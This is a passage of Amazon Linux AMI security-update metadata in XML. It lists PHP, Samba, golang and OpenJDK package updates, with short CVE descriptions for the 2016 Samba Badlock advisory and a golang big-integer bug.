release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.19-1.123.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-686</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-686: critical priority package update for samba</title><issued date="2016-04-13 11:45:00" /><updated date="2016-04-13 11:45:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2118:
A protocol flaw, publicly referred to as Badlock, was found in the Security Account Manager Remote Protocol (MS-SAMR) and the Local Security Authority (Domain Policy) Remote Protocol (MS-LSAD). Any authenticated DCE/RPC connection that a client initiates against a server could be used by a man-in-the-middle attacker to impersonate the authenticated user against the SAMR or LSA service on the server. As a result, the attacker would be able to get read/write access to the Security Account Manager database, and use this to reveal all passwords or any other potentially sensitive information in that database.
1317990:
CVE-2016-2118 samba: SAMR and LSA man in the middle attacks
CVE-2016-2115:
It was found that Samba did not enable integrity protection for IPC traffic by default. A man-in-the-middle attacker could use this flaw to view and modify the data sent between a Samba server and a client.
1312084:
CVE-2016-2115 samba: Smb signing not required by default when smb client connection is used for ipc usage
CVE-2016-2114:
It was discovered that Samba did not enforce Server Message Block (SMB) signing for clients using the SMB1 protocol. A man-in-the-middle attacker could use this flaw to modify traffic between a client and a server.
1312082:
CVE-2016-2114 samba: Samba based active directory domain controller does not enforce smb signing
CVE-2016-2113:
It was found that Samba did not validate SSL/TLS certificates in certain connections. A man-in-the-middle attacker could use this flaw to spoof a Samba server using a specially crafted SSL/TLS certificate.
1311910:
CVE-2016-2113 samba: Server certificates not validated at client side
CVE-2016-2112:
It was found that Samba&#039;s LDAP implementation did not enforce integrity protection for LDAP connections. A man-in-the-middle attacker could use this flaw to downgrade LDAP connections to use no integrity protection, allowing them to hijack such connections.
1311903:
CVE-2016-2112 samba: Missing downgrade detection
CVE-2016-2111:
It was discovered that Samba configured as a Domain Controller would establish a secure communication channel with a machine using a spoofed computer name. A remote attacker able to observe network traffic could use this flaw to obtain session-related information about the spoofed machine.
1311902:
CVE-2016-2111 samba: Spoofing vulnerability when domain controller is configured
CVE-2016-2110:
Several flaws were found in Samba&#039;s implementation of NTLMSSP authentication. An unauthenticated, man-in-the-middle attacker could use this flaw to clear the encryption and integrity flags of a connection, causing data to be transmitted in plain text. The attacker could also force the client or server into sending data in plain text even if encryption was explicitly requested for that connection.
1311893:
CVE-2016-2110 samba: Man-in-the-middle attacks possible with NTLMSSP authentication
CVE-2015-5370:
Multiple flaws were found in Samba&#039;s DCE/RPC protocol implementation. A remote, authenticated attacker could use these flaws to cause a denial of service against the Samba server (high CPU load or a crash) or, possibly, execute arbitrary code with the permissions of the user running Samba (root). This flaw could also be used to downgrade a secure DCE/RPC connection by a man-in-the-middle attacker taking control of an Active Directory (AD) object and compromising the security of a Samba Active Directory Domain Controller (DC).
1309987:
CVE-2015-5370 samba: crash in dcesrv_auth_bind_ack due to missing error check
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5370" title="" id="CVE-2015-5370" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2110" title="" id="CVE-2016-2110" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2111" title="" id="CVE-2016-2111" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2112" title="" id="CVE-2016-2112" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2113" title="" id="CVE-2016-2113" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2114" title="" id="CVE-2016-2114" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2115" title="" id="CVE-2016-2115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2118" title="" id="CVE-2016-2118" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libwbclient" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-test-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-devel-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.2.10" release="6.33.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.2.10-6.33.amzn1.noarch.rpm</filename></package><package name="libwbclient-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.2.10" release="6.33.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.2.10-6.33.amzn1.noarch.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="ctdb-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-devel-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="ctdb-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-devel-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-test-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-devel-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.2.10-6.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-687</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-687: medium priority package update for golang</title><issued date="2016-04-21 16:00:00" /><updated date="2016-04-21 16:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3959:
1324343:
CVE-2016-3959 golang: infinite loop in several big integer routines
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3959" title="" id="CVE-2016-3959" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-bin" version="1.5.3" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.5.3-1.21.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.5.3" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.5.3-1.21.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.5.3" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.5.3-1.21.amzn1.noarch.rpm</filename></package><package name="golang" version="1.5.3" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.5.3-1.21.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.5.3" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.5.3-1.21.amzn1.noarch.rpm</filename></package><package name="golang-docs" version="1.5.3" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.5.3-1.21.amzn1.noarch.rpm</filename></package><package name="golang" version="1.5.3" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.5.3-1.21.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.5.3" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.5.3-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-688</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-688: critical priority package update for java-1.8.0-openjdk</title><issued date="2016-04-21 16:00:00" /><updated date="2016-04-21 16:00:00" 